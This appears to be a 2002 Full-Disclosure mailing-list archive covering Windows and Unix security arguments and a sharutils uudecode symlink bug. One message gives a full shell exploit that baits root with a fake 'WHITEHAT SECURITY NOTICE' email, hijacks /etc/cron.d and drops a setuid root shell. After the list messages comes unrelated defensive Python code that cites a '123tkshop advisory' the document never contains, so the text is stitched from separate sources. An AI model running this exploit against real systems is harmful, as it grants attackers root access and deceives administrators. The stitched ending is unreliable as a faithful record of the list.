> you REALLY think this works... be so kind as to give us the IP addresses
> for these legacy machines.
> -KF
>
>
>>> Posted: 06/06/2002 at 12:10 GMT
>>> [724.gif] Here's an interesting way to secure an Internet-connected
>>> computer against intruders: Make sure the operating system and
>>> software it runs are so old that current hacking tools won't work on
>>> it. This was suggested by Brian Aker, one of the programmers who works
>>> on Linux.com, NewsForge, Slashdot, and other OSDN sites; he runs
>>> several servers of his own that host a number of small non-profit
>>> sites in the Seattle area. "I have one box still running a version of
>>> Solaris that's so old none of the script kiddies can figure it out,"
>>> Brian says. "They tend to focus on the latest and greatest, and don't
>>> have the slightest idea how to handle my old Sun box."
>>>
>>
>>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure at lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>
>

From dufresne at winternet.com Mon Jul 15 22:34:31 2002
From: dufresne at winternet.com (Ron DuFresne)
Date: Mon, 15 Jul 2002 16:34:31 -0500 (CDT)
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymoussurfing my ass\!)
In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EE417@UTDEVS02.campus.ad.utdallas.edu>
Message-ID: 

On Mon, 15 Jul 2002, Schmehl, Paul L wrote:

[SNIP]

>
> It isn't the OS that's the problem. It's the manufacturer's choices of
> default settings and the ignorance of the users (and admins in many
> cases.) Isn't this precisely the same problem on *nix? Give me an
> ignorant user on a default install of *nix and I'll give you a hacked
> box in a few minutes (except perhaps OpenBSD, which is one of the few
> that ship "secure" out of the box.)
>
> Please don't misunderstand - I am NOT saying Windows is as good as or as
> secure as Unix. Given the choice, I'll take OpenBSD. But the *real*
> problem isn't software, it's humans.

You hit on the duality of the issue before trying to refine it into a plurality issue. The *real* problem is vendors releasing buggy code with insecure defaults which *promotes* users remaining clueless. Take a look at the wireless issues spewing into the airwaves now, and look at not only the default installs of the products available for playing with wireless toys and trinkets, but take a serious look at the documentation and how much is devoted to the issue of securing the toys.

For example, take a look at the pdf manual for the d-link dwl-650 wireless net card: 80 pages, of which about 2 pages are devoted to trying to secure the devices in any fashion via wep. Not that wep is all that secure, but it beats nothing.

Or consider this, even if a vendor 'attempts' to do something less than a default open broadcast:

Orinoco RG-1000 residential gateway is reported in past advisories to ship with WEP enabled;

From: Bill Arbaugh
Subject: RG-1000 802.11 Residential Gateway default WEP key disclosure flaw
Date: Mon, 2 Apr 2001;

Unfortunately, the default WEP key is set to the default network name, SSID. The SSID appears in several 802.11 management frames in the clear-- even when WEP is enabled.
Therefore, an attacker with a sniffer capable of capturing management frames can determine the current WEP key, which is the last five digits of the network name (provided the default has not been changed). Armed with the network name and the current WEP key, the attacker can easily gain access to the user's wireless LAN.

Additionally, the default network name for the unit studied was the last six nibbles of the MAC address converted into ASCII [1]. As a result, even if the key were not the network name, an attacker could determine it by sniffing the MAC address of the unit.

To Lucent/Orinoco's credit, the fact that the default encryption key should be changed is strongly encouraged in the manual. However, the fact that the default key is disclosed in the clear as part of the network name is unfortunate. The default encryption key should be changed to a randomly generated value set at the factory.

The moral to this is, don't just beat up on the users, but get ugly with the vendors and force them to pay attention to security as well, and force users to shoot themselves in the foot rather than just shooting em in the head from the beginning. If openbsd only tried to do things half-assed, they certainly would not get the accolades they do from the user community here.

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

From mail at blazde.co.uk  Mon Jul 15 22:40:11 2002
From: mail at blazde.co.uk (Roland Postle)
Date: Mon, 15 Jul 2002 22:40:11 +0100
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!)
References: 
Message-ID: <002a01c22c48$336500c0$0a00a8c0@violetclub>

> > The fact that 99% of Windows users are clueless is no reflection on Windows'
> > actual security.
>
> But Microsoft touts "ease of use" which lulls people into believing that
> you don't need as much skill to use or secure Windows as UNIX. And that's
> irresponsible.

I perhaps should have said it's no reflection on Windows' security relative to unix. It is of course Microsoft's responsibility to make Windows more secure for the average clueless user, especially given that their advertising campaigns are so obviously directed at the clueless user.

> These are granular indeed, and confusing as hell. A good security model
> should be simple; the Windows one is anything but. I can probably outline
> the UNIX security model in 300 words. I challenge any Windows user to do
> the same for Windows.
>
> And complexity is the enemy of security. It can lead to misunderstanding,
> incorrect implementation, and ambiguity.

Agreed, complexity is the enemy of security, but unix file permissions are nothing but an unfortunate relic of the past. Owner and world permissions are a good start, and very useful. Group permissions are just a glance in the direction of a proper ACL. If a user wants to give access to another user to a file, can they? Not unless those two users happen to be by themselves in the same group. The user has to give all other users in the same group (or worse, everybody, if they happen to be in different groups) access to the file.

Then we come to the suid/sgid bits. What are they really about? It took me over a year of using unix to figure it out. If this file is executed it runs in the security context of its owner and/or group. Is that a permission? It certainly isn't a permission that refers to a user. It refers to something the file can do, and that's very different from whether a user can read/write/execute it or whatever.
The idea is to create 'program domains' (what a program can do or can't do, as opposed to what a user can do or can't do), but the fact that they're implemented as user domains is another fudge. And an extremely confusing one at that, because many unix programmers don't fully understand the distinction.

Windows is no less confusing, but as Paul pointed out, it is at least functional.

- Blazde

From pauls at utdallas.edu  Mon Jul 15 22:45:18 2002
From: pauls at utdallas.edu (Schmehl, Paul L)
Date: Mon, 15 Jul 2002 16:45:18 -0500
Subject: [Full-Disclosure] Counseling not to use Windows (was Re:Anonymoussurfing my ass\!)
Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EE4F2@UTDEVS02.campus.ad.utdallas.edu>

Comments inline.

Paul Schmehl (pauls at utdallas.edu)
Supervisor of Support Services
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/

> -----Original Message-----
> From: David F. Skoll [mailto:dfs at roaringpenguin.com]
> Sent: Monday, July 15, 2002 3:25 PM
> To: full-disclosure at lists.netsys.com
> Subject: RE: [Full-Disclosure] Counseling not to use Windows
> (was Re:Anonymoussurfing my ass\!)
>
>
> On Mon, 15 Jul 2002, Schmehl, Paul L wrote:
>
> > That depends on how the admins configure things. :-) Here at UTD, for
> > example, it isn't possible to execute a VBS file unless you know what
> > you're doing.
>
> Well, that's very good. How about .exe?

If they're attachments, they bounce at the mail gateway.

>
> > It's also possible to restrict the executables that a
> > user can run, using group policies.
>
> Yes, it is. How much work is it to set all this up?

Very easy. A few points and clicks in the admin's interface deploys the policy to the whole domain.

> [snip]
>
> These are granular indeed, and confusing as hell. A good
> security model should be simple; the Windows one is anything
> but. I can probably outline the UNIX security model in 300
> words. I challenge any Windows user to do the same for Windows.
>
> And complexity is the enemy of security. It can lead to
> misunderstanding, incorrect implementation, and ambiguity.
>

I totally agree with you.

> > It isn't the OS that's the problem.
>
> I disagree. The design of the OS is a large part of the
> problem. (I say "OS" here to include Microsoft applications
> like IE, which (after all) Microsoft insists are part of the OS.)
>

I think you're taking anecdotal evidence to condemn Windows unnecessarily. Just because Code Red ran around the world in short order doesn't *necessarily* mean the OS is flawed. It could mean the *philosophy* is flawed or the training is flawed or the admins are flawed. Remember, Unix admins have 30 years of experience under their belts telling them what is good security practice and what is not. Windows admins have 10? Maybe?

>
> That may have been true 3 or 4 years ago, but (at least in
> the Linux and *BSD worlds) is no longer. The default
> installation settings are pretty good nowadays.
>

Good point. I'm setting up a RedHat box for a website I do volunteer work for, and I have to say I'm pretty impressed. (First time I've worked with RedHat.) It had telnet and ftp and a number of services disabled by default, tcpwrappers installed and enabled, ipchains installed and enabled, etc., etc. Took me a little while just to figure out how to open the box up enough for me to ssh into it.

>
> I'm not arguing with you on that point. But I think it's
> correct to say that any organization interested in long-term
> security planning should consider weaning itself away from
> proven-insecure software. Microsoft's track record is really
> terrible, and I don't see any indications that things are
> changing. How much benefit of the doubt do vendors deserve, anyway?
>

I really hate defending Microsoft. In fact I believe that the next few years will see them losing significant market share as the momentum of open source software really starts to impact them.
(Walmart is now selling $500 boxes with Mandrake preinstalled.) However, their security track record is *not* as bad as you seem to think it is. You have to keep two things in mind: 1) their security advisories are for *all* their software, not just the OSes, and 2) they're a huge company. It's like trying to maneuver an oil tanker to make a 180 degree turn. You'd better have lots of time and room.

Microsoft's two biggest problems are that decisions they made a long time ago, when the OS wasn't Internet-enabled, have come back to bite them big time since they added the TCP/IP stack, and their programmers have had no direction WRT security whatsoever (until recently, one would hope.) When I wrote my article about the UPnP Vulnerability for Securityfocus, it was almost laughable. They bought (or wrote - I don't know which) some software to discover buffer overflows and ran it on the XP release code. One of their VP's confidently announced that they had "eliminated" buffer overflows from XP. Two months later Marc released the UPnP vuln info about a buffer overflow that was **by far** the most devastating B/O MS had ever had.

You have to remember that, for a business to switch from MS to *nix takes not only a huge shift in thinking on the part of management and users but also *wholesale* changes in the IT staff. I can guarantee you that our senior Windows admin would drown in a week if you threw *nix boxes at him and asked him to configure them securely (or even do "ls -l" for that matter.) Yet he's never had a Code Red or Nimda infected box and never had a breakin on his web servers. We haven't had a single major compromise on a Windows box under his control. (Can't say the same for other areas of the campus, but that's true of *nix as well.)

From dfs at roaringpenguin.com  Mon Jul 15 23:39:27 2002
From: dfs at roaringpenguin.com (David F. Skoll)
Date: Mon, 15 Jul 2002 18:39:27 -0400 (EDT)
Subject: [Full-Disclosure] Counseling not to use Windows (was Re:Anonymoussurfing my ass\!)
In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EE4F2@UTDEVS02.campus.ad.utdallas.edu>
Message-ID: 

On Mon, 15 Jul 2002, Schmehl, Paul L wrote:

> > Well, that's very good. How about .exe?

> If they're attachments, they bounce at the mail gateway.

Me, too. But that's a band-aid fix. Miserable design decisions on Microsoft's part have made e-mail responsible for spreading malicious executable content. In 1980, e-mail was plain text and totally safe. There is simply *no excuse* for having to scan e-mail at gateways -- it should *never* have been a problem in the first place.

> > Yes, it is. How much work is it to set all this up?

> Very easy. A few points and clicks in the admin's interface deploys the
> policy to the whole domain.

OK. Didn't know that.

[snip]

> I think you're taking anecdotal evidence to condemn Windows
> unnecessarily.

Please see http://www.roaringpenguin.com/graphs.php3

Cracked Windows boxes are so much of a problem that they've become background noise on the Internet.

> Just because Code Red ran around the world in short
> order doesn't *necessarily* mean the OS is flawed. It could mean the
> *philosophy* is flawed or the training is flawed or the admins are
> flawed. Remember, Unix admins have 30 years of experience under their
> belts telling them what is good security practice and what is not.
> Windows admins have 10? Maybe?

That's not really an excuse. UNIX was never really designed with security in mind, and in fact until recently, UNIX boxes were pretty insecure. (And many commercial UNIXes still are.) The difference is that most UNIX faults were implementation errors which could be fixed without radically altering the OS (at least from the user's perspective.) Many Windows problems can't be fixed without changing the fundamental nature of the system.
[snip]

> You have to remember that, for a business to switch from MS to *nix
> takes not only a huge shift in thinking on the part of management and
> users but also *wholesale* changes in the IT staff.

Or wholesale retraining. It's not easy. That's why it's a long-term strategic goal and not a short-term answer to security problems.

-- 
David.

From dfs at roaringpenguin.com  Mon Jul 15 23:44:58 2002
From: dfs at roaringpenguin.com (David F. Skoll)
Date: Mon, 15 Jul 2002 18:44:58 -0400 (EDT)
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!)
In-Reply-To: <002a01c22c48$336500c0$0a00a8c0@violetclub>
Message-ID: 

On Mon, 15 Jul 2002, Roland Postle wrote:

> Agreed complexity is the enemy of security, but unix file permissions are
> nothing but an unfortunate relic of the past.

Not arguing with that. UGO are simple, but not very flexible. They can be made to work well in most situations, though, especially if you use the modern setup whereby each user has his own group, and then you make additional groups for projects.

> Then we come to the suid/sgid bits. What are they really about? It took me
> over a year of using unix to figure it out. If this file is executed it runs
> in the security context of it's owner and/or group. Is that a permission?

Nope. It's a "file mode".

> The idea is to create 'program domains'
> (what a program can do or can't do, as opposed to what a user can do or
> can't do), but the fact that they're implemented as user domains is another
> fudge. And an extremely confusing one at that, because many unix programmers
> don't fully understand the distinction.

Actually, I find suid/sgid very easy to understand. They can be explained in a single sentence. And implementing program domains as user domains is necessary in UNIX because of the design. It might not be a pretty design, but it works, and (more importantly) doesn't have any fundamental security problems.
For very security-sensitive applications, this might not be good enough. NSA's SELinux has proper program domains and very fine-grained control over what each program can do. Internally to the Linux kernel, there are finer-grained "capabilities", but there's no agreement on how to map these to the file system.

> Windows is no less confusing, but as Paul pointed out, it is at least
> functional.

Aw, come on. :-) The UNIX model is pretty functional too.

-- 
David.

From madduck at madduck.net  Tue Jul 16 00:13:11 2002
From: madduck at madduck.net (martin f krafft)
Date: Tue, 16 Jul 2002 01:13:11 +0200
Subject: [Full-Disclosure] security through obsolescence??!@?!
In-Reply-To: <3D333D5C.1070501@bokeoa.com>
References: <03c201c22c49$994e3770$1031020a@home.barrington.com> <3D32FF73.6020809@snosoft.com> <3D333D5C.1070501@bokeoa.com>
Message-ID: <20020715231311.GG12705@fishbowl.madduck.net>

also sprach Charles 'core' Stevenson [2002.07.15.2323 +0200]:
> word man... rexd to the rescue? hehe... my god I know a couple of
> sysadmins who have the same philosophy. but it's pointless. it's like
> removing read privileges from vulnerable suids! some of us have over a
> gigabyte of security related exploits, scanners, sniffers, backdoors
> etc.. Dating back to the 80's. ;)

Could one such character, one who has over a gigabyte of security-related exploits, please contact me privately. I would like to profit from your help...

-- 
martin;              (greetings from the heart of the sun.)
  \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

consciousness: that annoying time between naps.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 240 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020716/c796b51c/attachment.bin

From madduck at madduck.net  Tue Jul 16 00:24:30 2002
From: madduck at madduck.net (martin f krafft)
Date: Tue, 16 Jul 2002 01:24:30 +0200
Subject: [Full-Disclosure] Sharutils buggy?
Message-ID: <20020715232430.GA14187@fishbowl.madduck.net>

I'd like to get some educated thoughts and opinions on a recently found potential bug:

  http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037
  http://online.securityfocus.com/bid/4742
  http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049
  http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033
  http://bugs.debian.org/149454
  http://www.kb.cert.org/vuls/id/336083

cheers,

-- 
martin;              (greetings from the heart of the sun.)
  \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

today, i will gladly share my experience and advice, for there are no sweeter words than "i told you so."
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 240 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020716/d0de5be2/attachment.bin

From mail at blazde.co.uk  Tue Jul 16 00:41:10 2002
From: mail at blazde.co.uk (Roland Postle)
Date: Tue, 16 Jul 2002 00:41:10 +0100
Subject: [Full-Disclosure] Korean Spam [Was: Counseling not to use Windows (was Re:Anonymoussurfing my ass\!)]
References: 
Message-ID: <004701c22c59$82b840e0$0a00a8c0@violetclub>

> Please see http://www.roaringpenguin.com/graphs.php3

The graph at the bottom is interesting, I get a lot of Korean spam too. Is it acknowledged by the Korean government as an acceptable way to do business? Or are there just some particularly successful email address collectors in Korea?
Btw, this started happening way before the World Cup, though I did get quite a lot of Korean World Cup related spam in June.

- Blazde

From mail at blazde.co.uk  Tue Jul 16 01:20:31 2002
From: mail at blazde.co.uk (Roland Postle)
Date: Tue, 16 Jul 2002 01:20:31 +0100
Subject: [Full-Disclosure] Sharutils buggy?
References: <20020715232430.GA14187@fishbowl.madduck.net>
Message-ID: <007401c22c5f$0864bc50$0a00a8c0@violetclub>

The problem seems to be that by default uudecode uses as the output filename the same filename used when the file was uuencoded. The fix is apparently to stop it following symbolic links. So an attacker couldn't uuencode with a filename that was in the /tmp directory. Then link the file in the tmp directory to whatever they wanted. My guess is you can't specify an absolute path (or ../) in the filename, and the assumption is that lots of people extract these files in the tmp directory where malicious symbolic links might reside.

Regardless it's not a 'grave' security problem as some people have said. And no, Uuencode isn't (or shouldn't be) suid/sgid before you ask.

- Blazde

----- Original Message -----
From: "martin f krafft"
To: "full-disclosure people"
Sent: Tuesday, July 16, 2002 12:24 AM
Subject: [Full-Disclosure] Sharutils buggy?

From core at bokeoa.com  Tue Jul 16 01:23:55 2002
From: core at bokeoa.com (Charles 'core' Stevenson)
Date: Mon, 15 Jul 2002 18:23:55 -0600
Subject: [Full-Disclosure] Sharutils buggy?
References: <20020715232430.GA14187@fishbowl.madduck.net>
Message-ID: <3D33679B.3050707@bokeoa.com>

Well you could check out some e-mail programs etc... Imagine that an attacker sends e-mail to root at some.host with a uuencoded attachment. The attacker has local access to the machine and knows that root's e-mail program calls system("uudecode %s",file) would allow the attacker to setup the uuencode file in such a fashion as to make this work... whether such a case exists is pure speculation.
But out of boredom I've attached a theoretical exploit.

peace,
core

martin f krafft wrote:
> I'd like to get some educated thoughts and opinions on a recently found
> potential bug:
>
> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037
> http://online.securityfocus.com/bid/4742
> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049
> http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033
> http://bugs.debian.org/149454
> http://www.kb.cert.org/vuls/id/336083
>
> cheers,
>
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: uudecode.sh
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020715/631943bf/attachment.ksh

From core at bokeoa.com  Tue Jul 16 01:32:04 2002
From: core at bokeoa.com (Charles 'core' Stevenson)
Date: Mon, 15 Jul 2002 18:32:04 -0600
Subject: [Full-Disclosure] Sharutils buggy?
References: <20020715232430.GA14187@fishbowl.madduck.net> <007401c22c5f$0864bc50$0a00a8c0@violetclub>
Message-ID: <3D336984.7050607@bokeoa.com>

Actually it uses the full path.. at least on debian.. see previously attached concept exploit. Of course I had to create a retarded mail program that simply ran uudecode on the attachment. ;)

peace,
core

Roland Postle wrote:
> The problem seems to be that by default uudecode uses as the output filename
> the same filename used when the file was uuencoded. The fix is apparently to
> stop it following symbolic links. So an attacker couldn't uuencode with a
> filename that was in the /tmp directory. Then link the file in the tmp
> directory to whatever they wanted. My guess is you can't specify an absolute
> path (or ../) in the filename, and the assumption is that lots of people
> extract these files in the tmp directory where malicious symbolic links might
> reside.
>
> Regardless it's not a 'grave' security problem as some people have said. And
> no, Uuencode isn't (or shouldn't be) suid/sgid before you ask.
>
> - Blazde
>
> ----- Original Message -----
> From: "martin f krafft"
> To: "full-disclosure people"
> Sent: Tuesday, July 16, 2002 12:24 AM
> Subject: [Full-Disclosure] Sharutils buggy?
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure at lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>
>

From core at bokeoa.com  Tue Jul 16 01:34:42 2002
From: core at bokeoa.com (Charles 'core' Stevenson)
Date: Mon, 15 Jul 2002 18:34:42 -0600
Subject: [Full-Disclosure] Sharutils buggy?
References: <20020715232430.GA14187@fishbowl.madduck.net> <3D33679B.3050707@bokeoa.com>
Message-ID: <3D336A22.7090700@bokeoa.com>

One small fix it should create the file with 666 perms ;)

Charles 'core' Stevenson wrote:
> Well you could check out some e-mail programs etc... Imagine that an
> attacker sends e-mail to root at some.host with a uuencoded attachment. The
> attacker has local access to the machine and knows that root's e-mail
> program calls system("uudecode %s",file) would allow the attacker to
> setup the uuencode file in such a fashion as to make this work...
> whether such a case exists is pure speculation. But out of boredom I've
> attached a theoretical exploit.
>
> peace,
> core
>
> martin f krafft wrote:
>
>> I'd like to get some educated thoughts and opinions on a recently found
>> potential bug:
>>
>> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037
>> http://online.securityfocus.com/bid/4742
>> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049
>> http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033
>> http://bugs.debian.org/149454
>> http://www.kb.cert.org/vuls/id/336083
>>
>> cheers,
>>
>
>
> ------------------------------------------------------------------------
>
> #!/bin/sh
> #
> # Conceptual uuencode + mailprogram privilege
> # local privilege escalation exploit
> #
> # Coded out of boredom...
> #
> # by Charles Stevenson
> #
> # Mon Jul 15 18:22:13 MDT 2002
>
> target="/home/core/mymail" # Root's mail program that calls uudecode
> tempdir="/tmp"
>
> if [ -u /.sushi ] ; then
> exec /.sushi
> fi
>
> printf "Checking for $target..."
> if [ -f "$target" ] ; then
> echo "done."
> else
> echo "NO!"
> exit 1
> fi
>
> if [ ! -d "$tempdir/core" ]; then
> printf "Creating $tempdir/core..."
> if ! mkdir "$tempdir/core" 2>/dev/null ; then
> echo "FAILED!" ; exit 1
> fi
> echo "done."
> fi
>
> printf "Changing directory to $tempdir/core..."
> if ! cd "$tempdir/core" 2>/dev/null ; then
> echo "FAILED!" ; exit 1
> else
> echo "done."
> fi
>
> printf "Creating cron.d symlink..."
> if ! ln -fs /etc/cron.d/core you 2>/dev/null; then
> echo "FAILED!" ; exit 1
> else
> echo "done."
> fi
>
> printf "Changing umask..."
> if ! umask 000 ; then
> echo "FAILED!" ; exit 1
> else
> echo "done."
> fi
>
> printf "Compiling root shell..."
> cat >sushi.c < #include
> int main (int argc, char **argv, char **envp) {
> setuid(0);
> setgid(0);
> execve("/bin/sh",argv,envp);
> return -1;
> }
> EOF
> if ! cc sushi.c -o sushi 2>/dev/null; then
> echo "FAILED!" ; exit 1
> else
> echo "done."
> fi
>
> printf "Compiling cron takeover..."
> cat >takeover.c < #include
> main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); }
> EOF
> if ! cc takeover.c -o own 2>/dev/null; then
> echo "FAILED!" ; exit 1
> fi
> echo "done."
>
> printf "Performing attack... come back when root reads his e-mail..."
> cat >gosh < core
> EOF
> uuencode gosh /tmp/core/you > uuownme
> if mail-files root at localhost ascii "WHITEHAT SECURITY NOTICE Your system was compromised. Attached is a tarball with details exlaining how." uuownme; then
> echo "FAILED!"; exit 1
> fi
> echo "MESSAGE SENT!"
>
> printf "Waiting for root to check his e-mail with $target..."
> while [ ! -u /etc/cron.d/core ] ; then
> sleep 1; printf "."
> done
> echo "DONE!!!"
>
> printf "Setting up evil cron job..."
> cat >croncore < */1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own"; fi
> EOF
> if ! cat croncore 2>/dev/null >/etc/cron.d/core; then
> echo "FAILED!" ; exit 1
> else
> echo "done."
> fi
>
> printf "Waiting for root shell"
> while [ ! -u /.sushi ] ; do
> sleep 1 ; printf "."
> done
> echo "done."
>
> cd /
>
> printf "Cleaning up real quick..."
> if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then
> echo "FAILED??? Fuck it!"
> else
> echo "done."
> fi
>
> echo "Spawning root shell!!! God Damn! I say GOD DAMN!!"
> if ! exec /.sushi -i; then
> echo "Exec Failed!!! BUMMER!" ; exit 1
> fi

From core at bokeoa.com  Tue Jul 16 01:41:01 2002
From: core at bokeoa.com (Charles 'core' Stevenson)
Date: Mon, 15 Jul 2002 18:41:01 -0600
Subject: [Full-Disclosure] Sharutils buggy?
References: <20020715232430.GA14187@fishbowl.madduck.net> <3D33679B.3050707@bokeoa.com> <3D336A22.7090700@bokeoa.com>
Message-ID: <3D336B9D.4050805@bokeoa.com>

Sorry for the spam all... my last message was sent in haste thinking I'd made an error. It does in fact create the uuencoded file with 666 perms because I remembered to call umask 0.. when I tested locally I forgot to remove the first uuencode file I'd created before changing umask... sorry and enjoy the search for a program that calls uudecode as root on a user supplied file.

peace,
core

From dotslash at snosoft.com  Tue Jul 16 04:45:10 2002
From: dotslash at snosoft.com (KF)
Date: Mon, 15 Jul 2002 20:45:10 -0700
Subject: [Full-Disclosure] Sharutils buggy?
References: <20020715232430.GA14187@fishbowl.madduck.net> <3D33679B.3050707@bokeoa.com> <3D336A22.7090700@bokeoa.com> <3D336B9D.4050805@bokeoa.com>
Message-ID: <3D3396C6.9020205@snosoft.com>

heh I am drunk... fuckers ambushed me in my cubicle before I left work ...
-KF
you got malloc on ppc working?
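The Sharutils thread above turns on three properties of a decoder: whether it writes to whatever name (and path) the `begin` line carries, whether it follows a symlink already sitting at that name, and whether it honours the header's mode bits (core's "666 perms" remark). The decoder below is an added example, not sharutils code, not core's script and not the Debian fix itself; it confines the output name to one directory, creates the file with O_CREAT|O_EXCL so an existing symlink makes the open fail instead of being followed, and masks the header mode so a `begin 666` line cannot produce a world-writable file. The sample attachments, file names and temporary directory are constructed for the demonstration.

```python
import binascii
import os
import re
import tempfile

# Header line of a uuencoded body: "begin <octal mode> <name>"
BEGIN_RE = re.compile(r"^begin ([0-7]{3,4}) (.+)$")


def parse_begin_line(line):
    """Return (mode, name) from a uuencode 'begin' line, or raise ValueError."""
    m = BEGIN_RE.match(line.rstrip("\r\n"))
    if not m:
        raise ValueError("not a uuencode begin line")
    return int(m.group(1), 8), m.group(2)


def safe_output_path(name, outdir):
    """Confine the output to outdir: the header may only name a plain file,
    never an absolute path or anything with a directory component."""
    if "\x00" in name or name in ("", ".", "..") or name != os.path.basename(name):
        raise ValueError("refusing unsafe output name from header: %r" % name)
    return os.path.join(outdir, name)


def safe_mode(mode):
    """Drop setuid/setgid/sticky and group/world write bits from the header mode."""
    return mode & 0o755


def open_new_file(path, mode):
    """Create a brand-new file. O_EXCL makes open() fail with EEXIST when
    anything, including a symlink, already has that name, so a planted link
    is never followed; O_NOFOLLOW is belt-and-braces where available."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    return os.fdopen(os.open(path, flags, mode), "wb")


def uudecode(text, outdir):
    """Decode one uuencoded body into outdir; returns the created path."""
    lines = text.splitlines()
    mode, name = parse_begin_line(lines[0])
    path = safe_output_path(name, outdir)
    with open_new_file(path, safe_mode(mode)) as f:
        for line in lines[1:]:
            if line == "end":
                break
            if line.strip():  # the trailing "`" line decodes to zero bytes
                f.write(binascii.a2b_uu(line))
    return path


def uuencode(name, mode, data):
    """Build a uuencoded body; used here only to construct sample input."""
    out = ["begin %o %s" % (mode, name)]
    for i in range(0, len(data), 45):
        out.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n"))
    out += ["`", "end"]
    return "\n".join(out) + "\n"


def demo():
    """Run the decoder against the three cases from the thread; returns a dict."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        # 1. ordinary attachment: decodes, and never becomes group/world-writable
        p = uudecode(uuencode("hello.txt", 0o666, b"hello, list\n" * 10), d)
        with open(p, "rb") as f:
            results["roundtrip"] = f.read() == b"hello, list\n" * 10
        results["no_world_write"] = (os.stat(p).st_mode & 0o022) == 0
        # 2. header naming an absolute path (as in the posted script): refused
        try:
            uudecode(uuencode("/tmp/core/you", 0o666, b"x"), d)
            results["abs_path_refused"] = False
        except ValueError:
            results["abs_path_refused"] = True
        # 3. a symlink already sitting where the output would go: not followed
        target = os.path.join(d, "target")
        with open(target, "w") as f:
            f.write("original\n")
        os.symlink(target, os.path.join(d, "you"))
        try:
            uudecode(uuencode("you", 0o644, b"clobbered\n"), d)
            results["symlink_refused"] = False
        except FileExistsError:
            results["symlink_refused"] = True
        with open(target) as f:
            results["target_intact"] = f.read() == "original\n"
    return results


if __name__ == "__main__":
    print(demo())
```

The O_EXCL open is the part that matters most: a "does it exist / is it a link" check before open() would leave a window in which the link is planted between the check and the write, whereas O_CREAT|O_EXCL is decided atomically by the kernel.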
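For the two problems in the 123tkshop advisory earlier in this section (an include() built from a user-supplied path, and request data pasted unslashed into SQL), here is the defender-side handling as an added example, in Python rather than PHP so that it runs stand-alone; it is not code from the advisory or from 123tkshop, and the styles directory, item table and item names are constructed. The first function rejects a NUL byte before the path ever reaches the C library, which is where the truncation the advisory demonstrates happens, and then checks that the canonicalized path still lies under the styles root; the second pair shows the same lookup with string-pasted input and with a bound parameter, which achieves what addslashes() on every input was trying to achieve by hand.

```python
import os
import sqlite3

# Constructed layout standing in for the shop's "styles/$designNo/footer.php"
STYLE_ROOT = "styles"


def resolve_under(root, user_part, leaf):
    """Join root/user_part/leaf and return the canonical path only if it is
    still inside root; raise ValueError otherwise.

    The NUL check comes first: the C-level open() behind include() stops
    reading the name at the first NUL, so "../../../etc/passwd" followed by
    a NUL and any suffix is opened as /etc/passwd while a naive suffix check
    still sees the suffix.
    """
    if "\x00" in user_part:
        raise ValueError("NUL byte in user-supplied path component")
    root_abs = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_abs, user_part, leaf))
    # realpath has collapsed any ../ and followed symlinks, so a prefix
    # comparison on the result is meaningful
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        raise ValueError("path escapes %s: %s" % (root, candidate))
    return candidate


def footer_for(design_no):
    """The include() target for a design number, or ValueError."""
    return resolve_under(STYLE_ROOT, design_no, "footer.php")


# --- the addslashes() problem: a constructed item table in memory ----------

def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, hidden INTEGER)")
    conn.executemany("INSERT INTO items (name, hidden) VALUES (?, ?)",
                     [("widget", 0), ("gadget", 0), ("unreleased", 1)])
    return conn


def describe_item_unsafe(conn, name):
    """Request data pasted straight into the statement: the pattern the
    advisory flags. A quote in `name` ends the literal and the rest is SQL."""
    sql = "SELECT name FROM items WHERE name = '%s' AND hidden = 0" % name
    return [row[0] for row in conn.execute(sql)]


def describe_item_safe(conn, name):
    """Bound parameter: the driver delivers the value separately from the
    statement text, so no per-call quoting discipline is needed."""
    sql = "SELECT name FROM items WHERE name = ? AND hidden = 0"
    return [row[0] for row in conn.execute(sql, (name,))]


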